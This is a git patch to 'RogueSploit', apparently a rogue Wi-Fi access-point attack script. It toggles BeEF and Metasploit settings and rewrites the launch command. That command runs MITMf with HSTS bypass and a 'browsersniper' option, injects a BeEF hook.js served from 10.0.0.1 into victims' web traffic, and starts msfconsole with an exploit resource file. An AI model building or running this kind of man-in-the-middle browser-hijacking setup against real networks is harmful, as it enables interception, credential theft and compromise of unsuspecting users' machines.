From f7cb38aac3d584fb1d09d214ed3e0860c2908ed9 Mon Sep 17 00:00:00 2001 From: Francesco Grotti Date: Sun, 19 Feb 2017 17:05:06 +0100 Subject: [PATCH] Update RogueSploit --- RogueSploit | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/RogueSploit b/RogueSploit index e44ea52..5acb94c 100644 --- a/RogueSploit +++ b/RogueSploit @@ -312,7 +312,7 @@ beef: key: "beef_key.pem" cert: "beef_cert.pem" metasploit: - enable: true + enable: false social_engineering: enable: true evasion: @@ -910,7 +910,7 @@ EOF beef: module: browser_autopwn: - enable: true + enable: false category: "Metasploit" name: "Browser AutoPwn" description: "This module will redirect a user to the autopwn port on a Metasploit listener and then rely on Metasploit to handle the resulting shells. If the Metasploit extension is loaded, this module will pre-populate the URL to the pre-launched listener. Otherwise, enter the URL you would like the user to be redirected to." @@ -920,7 +920,7 @@ beef: EOF sleep 0.6 echo -e $blue"["$red"!"$blue"]"$white" Starting Roguesploit Pwning! "$blue"["$red"!"$blue"]" - rogueon && echo -e $blue"["$red"!"$blue"]"$white" MITMF will load after 30 sec to permit BeEF to load everything!"$blue"["$red"!"$blue"]" & xterm -title "BeEF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25+1 -e "./BeEFStarter" & sleep 20 && xterm -title "MITMF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25-1 -e "sudo mitmf -i at0 --hsts --inject --js-url http://10.0.0.1:3000/hook.js" + rogueon && echo -e $blue"["$red"!"$blue"]"$white" MITMF will load after 20 sec to permit BeEF to load everything!"$blue"["$red"!"$blue"]" & xterm -title "BeEF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25+1-1 -e "msfconsole -r $(pwd)/roguepwn3.rc" & xterm -title "BeEF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25+1 -e "./BeEFStarter" & sleep 20 && xterm -title "MITMF" -bg "#000000" -fg "#FFFFFF" -geometry 100x25-1 -e "sudo mitmf -i at0 --hsts --browsersniper --inject --js-url http://10.0.0.1:3000/hook.js" menu } #Welcome Screen